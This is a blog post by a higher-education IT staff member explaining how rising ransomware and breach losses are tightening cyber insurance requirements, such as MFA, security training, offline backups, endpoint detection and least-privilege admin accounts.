The changing requirements to obtain cyber insurance coverage are becoming a driver to advance the security timeline for many organizations. The risk and impact of ransomware and data breaches is great and this is rippling through the insurance industry and across higher education.
Why is the landscape changing?
The ability of organizations to obtain cyber insurance has really changed over the past 3-4 years. What was once a minor line item in a coverage bundle 5 or more years ago is now expensive and offers limited coverage. This is not surprising as data breaches have been steadily increasing for the past decade and in 2016 there were on average 3 a day. Losses by insurance companies have been growing. 2020 was a rough year for higher education, my sector, with an average breach cost of $3.9 million. So insurance companies were footing most of the bill and taking losses. Ransomware has been a focus of recent years. While the ransoms typically are less than a breach cost – under $1 million often – they proved costly to insurance companies. Interestingly, insurance companies bring in negotiators to reduce the ransom.
What is the impact to organizations?
After the growing losses hit highs in 2020, insurance companies started increasing their requirements as to what would make an organization insurable. First the requirements for multi-factor authentication (MFA) on remote access (VPNs, Remote Desktop) came and now have been followed by requirements for MFA on single-sign-on (SSO) connected web services. Don’t get me wrong, MFA is a great tool (imperfect but all technology is imperfect) and getting more organizations to use MFA will increase security. Since the bad actors are looking to phish users to get inside the corporate network, using a compromised account provides a logical way to reach more users and to reach those users with access to valuable data. MFA helps to greatly reduce the chance an account will be compromised. Again, nothing is foolproof. But I’ve seen organizations be on different stages of their MFA journey and this requirement can come quickly and that’s a challenge. MFA is a big organization change and requires careful change management. I’ll get more into that in a future post.
Cyber security training has become a requirement as well – often multiple times a year now. And it should be followed up with phishing simulations to “test” the training. Hopefully most organizations have been doing this at least annually for a few years. Such training is often part of annual financial audit requirements. Depending on what service organizations currently subscribe to they may need to change to meet both of these requirements. I know I did.
With ransomware being a major focus the likely future requirements could include that backups are physically separate from the network. It is typical for ransomware actors to search for backups and encrypt them as well. If you have a good backup you may not need to pay the ransom.
While MFA will potentially keep bad actors out of email, users can still be tricked into clicking links and downloading files. This is where insurance will start to focus on the endpoint, the computer. Can users install software? Ideally not. Does the organization use next-generation anti-virus and/or endpoint detection and response (EDR) software? This next generation of endpoint protection looks for behaviors on devices and not signatures of known viruses. With the tools available today a bad actor can create a new type of malware without being technical. That is why looking at behaviors is the current trend – an Excel file should not start a shell script that tries to download software.
What should we do?
With the changing landscape that can make long-term security planning a challenge. I think organizations should keep in close contact with their insurers to be aware of what they are seeing in the market and what they anticipate new requirements to me. I think focusing on strategies that center on the user provide the most value as most ransomware gains entry from human actions. Some of those would be MFA, cyber security training and phishing simulations, improved endpoint protection, limiting of security access on endpoints. Additionally, for years it was quicker for IT organizations to give IT staff broader security access and now we just can’t do that. We in IT need to have separate accounts with elevated access (our daily work accounts need to be regular users) an we need to grant the least access required for the job. We in IT are still users and are still fallible so we need to take the extra step, which creates extra time, to protect our organizations.